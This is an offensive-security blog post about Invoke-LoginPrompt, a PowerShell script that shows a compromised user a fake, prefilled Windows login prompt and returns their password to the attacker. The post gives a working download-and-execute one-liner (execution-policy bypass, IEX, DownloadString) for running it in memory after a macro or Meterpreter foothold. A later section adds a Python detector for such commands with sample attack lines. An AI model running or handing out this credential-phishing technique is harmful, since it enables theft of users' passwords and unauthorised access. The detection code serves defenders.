Phishing for Credentials: If you want it, just ask!

**Update**

I have updated the script so it checks for credential validation. The prompt will not close until the user enters the correct password. Once validated, it will display the password for you.

Today, I was playing with Invoke-Mimikatz, created by @JosephBialek, which takes Mimikatz (created by @gentilkiwi) and loads it into memory. I absolutely LOVE this tool, but I get sad when I don’t have admin rights on the box and I don’t want to touch disk. If all you are after are the current user’s credentials (for email, VPN, network access), you can use this method. I initially thought of this after reading a report by FireEye regarding FIN4’s method of invoking an Outlook login prompt when the macro is run. You can find this report here.

You can find my code here:

https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1

Basically, you compromise a machine using a malicious VBA macro or some other vector. Once you have access to this machine, drop to a shell by typing “Shell” at the Meterpreter prompt.


From there, you can run the following command:

```
powershell.exe -ep bypass -c IEX ((New-Object Net.WebClient).DownloadString('URL_To_Invoke-LoginPrompt')); Invoke-LoginPrompt
```

*When you add the URL to the Invoke-LoginPrompt script, make sure you use the “Raw” version on GitHub or host your own.*


When this runs, the user will get a prompt that is pre-populated with their domain and username.


When the user enters their password, it will return it to you with the domain and the user’s username:

From there, you can now log in to whatever resources you want as that user.
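On the defensive side, the one-liner above appears in process-creation logging (Windows event 4688 with command-line auditing, or Sysmon event 1). The following is an added example, not part of the original post or the Invoke-LoginPrompt project, that flags this fetch-and-execute pattern; the function names, sample command lines and `example.invalid` URLs are constructed for illustration.

```python
import re

# Unambiguous prefixes of -ExecutionPolicy accepted by powershell.exe, plus the -ep alias.
_EP_FLAGS = {"-ep"} | {"-" + "executionpolicy"[:n] for n in range(2, 16)}

# Indicator name -> pattern, each taken from one part of the one-liner in this post.
_INDICATORS = {
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "web_client": re.compile(r"new-object\s+(system\.)?net\.webclient", re.I),
    "remote_fetch": re.compile(r"\.download(string|data)\s*\(", re.I),
}
_POWERSHELL = re.compile(r"(powershell|pwsh)", re.I)

def indicators(cmdline: str) -> set:
    """Return the names of the indicators present in one process command line."""
    if not _POWERSHELL.search(cmdline):
        return set()
    found = {name for name, rx in _INDICATORS.items() if rx.search(cmdline)}
    tokens = cmdline.lower().split()
    # "-ep bypass": the flag and its value are adjacent whitespace-separated tokens.
    for flag, value in zip(tokens, tokens[1:]):
        if flag in _EP_FLAGS and value in ("bypass", "unrestricted"):
            found.add("policy_bypass")
    return found

def is_download_cradle(cmdline: str) -> bool:
    """True when the command both downloads content and executes it in memory."""
    hit = indicators(cmdline)
    return "in_memory_exec" in hit and "remote_fetch" in hit

# Constructed process-creation command lines (assumed samples, not real telemetry).
SAMPLE_EVENTS = [
    "powershell.exe -ep bypass -c IEX ((New-Object Net.WebClient).DownloadString('https://example.invalid/script.ps1')); Invoke-LoginPrompt",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    "powershell.exe -NoProfile -Command Get-Service | Where-Object Status -eq Running",
    "PowerShell -Exec Bypass -Command Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://example.invalid/a')",
]

def triage(events):
    """Return (command line, sorted indicators) for every download cradle seen."""
    return [(e, sorted(indicators(e))) for e in events if is_download_cradle(e)]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_EVENTS):
        print(hits, "::", cmd)
```

Plain string matching only catches the command as typed; encoded or obfuscated variants need PowerShell script block logging (event 4104), which records the script text after it is decoded.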

 

 

 

Thanks,

Matt N. (@enigma0x3)

3 thoughts on “Phishing for Credentials: If you want it, just ask!”

  1. Awesome! I’ve come across this situation a few times and always had to somehow elevate to SYSTEM or local admin to get hashes/clear-text passes out.
